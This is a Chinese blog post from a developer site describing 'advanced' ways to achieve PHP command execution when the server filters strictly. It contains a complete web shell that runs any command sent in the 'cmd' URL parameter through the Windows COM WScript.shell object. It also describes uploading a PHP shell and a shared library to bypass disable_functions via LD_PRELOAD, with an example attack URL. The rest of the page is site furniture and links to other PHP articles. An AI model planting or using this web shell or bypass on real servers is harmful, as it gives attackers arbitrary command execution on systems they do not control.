PHP中命令执行的几种姿势总结(二)-高级用法

于 2021-11-09 14:56:01 发布
阅读量566 收藏
点赞数
分类专栏: 信息安全 文章标签: php 开发语言 后端 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csd_ct/article/details/121221203
版权

上一篇文章中介绍了php命令执行的几种姿势的基础用法 ,除了基础用法之外,还有几种高级用法可以考虑,在服务端过滤严格、安全措施较高的情况下,有时可以派上大用场。

1、com组件的使用

在php5.4及以上的版本中,可以开启com组件,直接执行某些cmd命令行,如在在php.ini文件中,开启extension=php_com_dotnet.dll,如图,

查看phpinfo,该组件是否开启 

 直接调用com组件,执行相关命令,shellcode,如下,

<?php 
	$command = $_GET['cmd'];
	$wsh = new COM("WScript.shell");
	$exec = $wsh->exec("cmd /c ".$command);
	$stdout = $exec->StdOut();
	$stroutput = $stdout->ReadAll();
	echo $stroutput;
?>

执行ping 127.0.0.1 如图,

2、Linux 动态库的使用

 对于linux系统,需要加载动态库so文件,详见github:GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/

 站在巨人的肩膀上,就不再分析具体的细节过程了,将项目中的so文件直接拿来使用,将php shell 文件和so文件都上传到服务器下同一个目录后,访问如下url:

http://x.x.x.x/bypass_disablefunc.php?cmd=id&outpath=/var/www/html/xxx&sopath=/var/www/html/bypass_disablefunc_x64.so

没来得及实践,后面动手补上

csd_ct
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP高级语法(一)—— 文件处理2
云(存储),松(耦合)
03-22 1641
  file(PHP 3, PHP 4, PHP 5)file -- 把整个文件读入一个数组说明array file ( string filename [, int use_include_path [, resource context]] )和 readfile() 一样,只除了 file() 将文
PHP几种删除目录的方法总结
10-30
### PHP几种删除目录的方法总结PHP开发过程,经常需要处理文件系统的操作,其删除目录是一项常见的需求。本文将详细介绍几种PHP删除目录的方法,并对每种方法的特点进行分析,帮助开发者根据实际情况...
PHP 数组的一些高级用法
zxk7516的专栏
06-21 740
使用 php 原生的数组函数,不要看见数组就使用 foreach , 能有效降低程序的复杂度,精简代码量。 过滤组元素$input = [ 'a' => '', 'b' => '', 'c' => '']; $allowed = ['a', 'b']; $data = array_insert_key( $input , array_flib( $allowed ) );将数据库获取的多条数据的主键
PHP高级初级的一些用法
没有用户名的博客
01-10 680
PHP自定义错误处理: class proException extends Exception { //根据业务需求,自定义错误方法 /** * 获取错误信息 * @param int $type 类型 1=json 2=数组 * @return array */ public function getErrorInfo($
10条PHP经验总结
weixin_30619101的博客
10-14 116
1.使用一个SQL注射备忘单一个基本的原则就是,永远不要相信用户提交的数据。另一个规则就是,在你发送或者存储数据时对它进行转义(escape)。可以总结为:filter input, escape output (FIEO). 输入过滤,输出转义。通常导致SQL注射漏洞的原因是没有对输入进行过滤,如下语句: 1234 <?php$query="SELECT...
PHP高级应用
帝都搬砖客
01-08 1006
PHP高级应用: create_function():给原类附加个方法,过多时建议直接用继承。 高级环境配置、高级语法和应用、面向对象技术、高级图像技术、用PHPLIB实现模板的处理、用PHPDoc实现文档的自动生成、PHP与组件技术、PHP的Socket编程、PHP与WML、PHP与XML。 利用PHP的header()函数可以调整Web浏览器和代理服务器的缓存。4种头标类型:Last-M
php执行系统命令的方法
10-24
PHP,有时候我们需要执行一些操作系统级别的命令,比如文件操作、系统查询等。这些操作可以通过PHP内置的一些函数来实现。本文将详细讲解如何在PHP执行系统命令,重点讨论`escapeshellcmd`和`exec`这两个函数...
php外部执行命令函数用法小结
12-19
标题的“php外部执行命令函数用法小结”是指在PHP编程,如何利用特定的内置函数来调用操作系统(通常是在Linux环境下)的命令。这些函数允许PHP代码与操作系统进行交互,执行如文件操作、系统管理等任务。在描述...
CentOS实现将php和mysql命令加入到环境变量几种方法
09-09
以下就是几种在CentOSPHP和MySQL命令加入到环境变量的方法。 首先,我们要理解环境变量`PATH`的作用。`PATH`是一个包含可执行文件(如命令)目录的列表,当我们在终端输入一个命令时,系统会在这些目录下查找...
php 高级技巧,10条PHP高级技巧[修正版]
weixin_36334361的博客
03-11 390
10条PHP高级技巧,让你提高php效率。1.使用一个SQL注射备忘单一个基本的原则就是,永远不要相信用户提交的数据。另一个规则就是,在你发送或者存储数据时对它进行转义(escape)。可以总结为:filter input, escape output (FIEO). 输入过滤,输出转义。通常导致SQL注射漏洞的原因是没有对输入进行过滤,如下语句:代码如下:2.了解比较运算符之间的不同例如,你使用...
PHP逻辑运算符高级用法
Icebreaker
07-12 228
在编程逻辑运算是一种特殊的运算,下面说明一下逻辑运算的短路特性高级使用 $a = "zhangsan"; $a == "张三" && $a = "张三"; echo $a;//zhangsan $b = "lisi"; $b == "李四" || $b = "李四"; echo $b;//李四 对于“与”(&&) 运算: x && y 当x为false时,直接跳过,不执行y;x为true时,执行y
php语法速记,PHP高级语法归纳2017
weixin_30717635的博客
04-10 167
PHP高级语法归纳2017PHP的优势主要用来做网站开发,许多小型网站都用PHP开发PHP是开源的,这是使得PHP经久不衰的原因。PHP高级语法你知道多少?下面yjbys小编为大家归纳PHP高级语法,欢迎阅读!一、执行系统外部命令system()exec()passthru()相同点:都可以获得命令执行的状态码1)用PHP提供的专门函数PHP提供共了3个专门的执行外部命令的函数: system(...
php如何使用高阶函数
qq_35774849的博客
07-03 862
1、首先学会数组转集合 (1)使用collect函数 $arr = [1, 2, 3, 4, 5]; $collect = collect($arr); (2)使用array_map函数
php高级IO用法
藏经阁
08-05 1151
无论哪种编程语言,IO操作都值得好好学习和理解。由于PHP简单的特性,不少人对此毫无概念也能写出可用的代码。本文总结PHP开发几个常见的IO场景并介绍对应的操作,希望能帮助PHP开发人员加深对IO的理解。后续文章将介绍隐藏在简单之下的本质:流。 本文介绍的场景包括:读写文件、命令行输入输出、与远程网址交互。废话少说,直接开始吧! 一、读写文件 文件的读写是最常规的IO操作。打开文件、读写...
php高级语法,PHP switch的“高级用法详解
weixin_27653327的博客
03-11 111
只所以称为“高级用法,是因为我连switch的最基础的用法都还没有掌握,so,接下来讲的其实还是它的基础用法!switch 语句和具有同样表达式的一系列的 IF 语句相似。很多场合下需要把同一个变量(或表达式)与很多不同的值比较,并根据它等于哪个值来执行不同的代码。这正是 switch 语句的用途。注意: 注意和其它语言不同,continue 语句作用到 switch 上的作用类似于 break...
php 高级函数,10条PHP高级技巧[修正版]
weixin_33992214的博客
03-10 143
1.使用一个SQL注射备忘单一个基本的原则就是,永远不要相信用户提交的数据。另一个规则就是,在你发送或者存储数据时对它进行转义(escape)。可以总结为:filter input, escape output (FIEO). 输入过滤,输出转义。通常导致SQL注射漏洞的原因是没有对输入进行过滤,如下语句:$query = "SELECT *FROM usersWHERE name = '{$_G...
榨干 PHP,不得不转的一篇PHP使用技巧!
子网'Blog
12-30 1744
榨干 PHP,不得不转的一篇PHP使用技巧!这篇杂文翻译整理自网络各路文档资料(见最末的参考资料),尤其是 Ilia Alshanetsky (佩服之至) 在多个 PHP 会议上的演讲,主要是各类提高 PHP 性能的技巧。为求精准,很多部分都有详细的效率数据,以及对应的版本等等。偷懒,数据就不一一给出了,直接给结论,如果需要看原文档,请到文末「参考资料」部分。橙色标题为推荐部分。=======
php高级数组,php遍历数组高级操作详解_PHP教程
weixin_39527292的博客
03-10 121
php遍历数据一般会使用到list,foreach,each其实一种,但下面的教程可能不会用到,下面我来给各位分别介绍一下遍历数组高级实例,希望此方法对大家有帮助。学习程式语言时, 总是学学 for, 然后再试著用 while 写出 for 的效果 等等的一些练习.来看看没有 foreach 前, 要想要有 foreach 的功能要怎?写(用 while、list、each 来达成).在这篇...
PHP在Linux上执行外部命令的三种方法详解
- **反引号(`)`:`system()`和`exec()`的另一种使用方式是通过反引号将命令包裹起来,这会在PHP脚本直接执行命令,并将输出捕获为字符串。 - **`popen()`函数**:这个函数允许以进程形式打开命令,提供更多的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值